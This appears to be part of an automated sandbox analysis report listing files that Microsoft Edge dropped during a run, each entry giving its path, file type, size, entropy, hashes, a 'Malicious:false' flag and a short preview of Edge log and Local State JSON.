                                                                                                                                                                                                                                                                                          SHA-256:D50D229BB9C2A81CD13FE106B44A85D2E19CFCBD2624DFEE83B40007F5AFBBFB
                                                                                                                                                                                                                                                                                          SHA-512:F6F76AA64BD95D8E52F6EE3D59465E68859FB232F09CDAF84A2CAF8F7BEF224F836D8709584E5516C382B2CF4217DBC19B47B968A485915E9B156D9CB55F9DBD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.694 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/31-10:59:17.695 6f0 Recovering log #3.2024/12/31-10:59:17.695 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.240928568131308
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5tTcVq2P923oH+TcwtfrzAdIFUt8MeSgZmw+MeSIkwO923oH+TcwtfrzILJ:PTkv4Yeb9FUt8x/+r5LYeb2J
                                                                                                                                                                                                                                                                                          MD5:737233CB439A62E11D7755870BF2A675
                                                                                                                                                                                                                                                                                          SHA1:9BC43B794D61E9083A049B6180156B1BEB49FDD8
                                                                                                                                                                                                                                                                                          SHA-256:D50D229BB9C2A81CD13FE106B44A85D2E19CFCBD2624DFEE83B40007F5AFBBFB
                                                                                                                                                                                                                                                                                          SHA-512:F6F76AA64BD95D8E52F6EE3D59465E68859FB232F09CDAF84A2CAF8F7BEF224F836D8709584E5516C382B2CF4217DBC19B47B968A485915E9B156D9CB55F9DBD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.694 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/31-10:59:17.695 6f0 Recovering log #3.2024/12/31-10:59:17.695 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3f936.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fa5f.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fa60.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fadc.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3faeb.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF423b1.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4243d.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090739758425852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMnwuF9hDO6vP6O+Ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE/6Qtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                          MD5:53E6174A7A8AD736B51551C38034DA87
                                                                                                                                                                                                                                                                                          SHA1:ACE50599E966385A160D82A2DF639A1AA4269F95
                                                                                                                                                                                                                                                                                          SHA-256:DBAA78CAD6D2D1F64E8F8E17271FEBE4FA8E8211DB2D3E37844340FF4D5883E0
                                                                                                                                                                                                                                                                                          SHA-512:FDE2C14EAB00940FCA1BE718613F6D7F0F83C2060B3370E277F93C014FE72EB792B3E387C22252313FBDB9F078EEC36BD9562E9E9AB81B03F98B422CC14FF4B5
                                                                                                                                                                                                                                                                                          Malicious:false
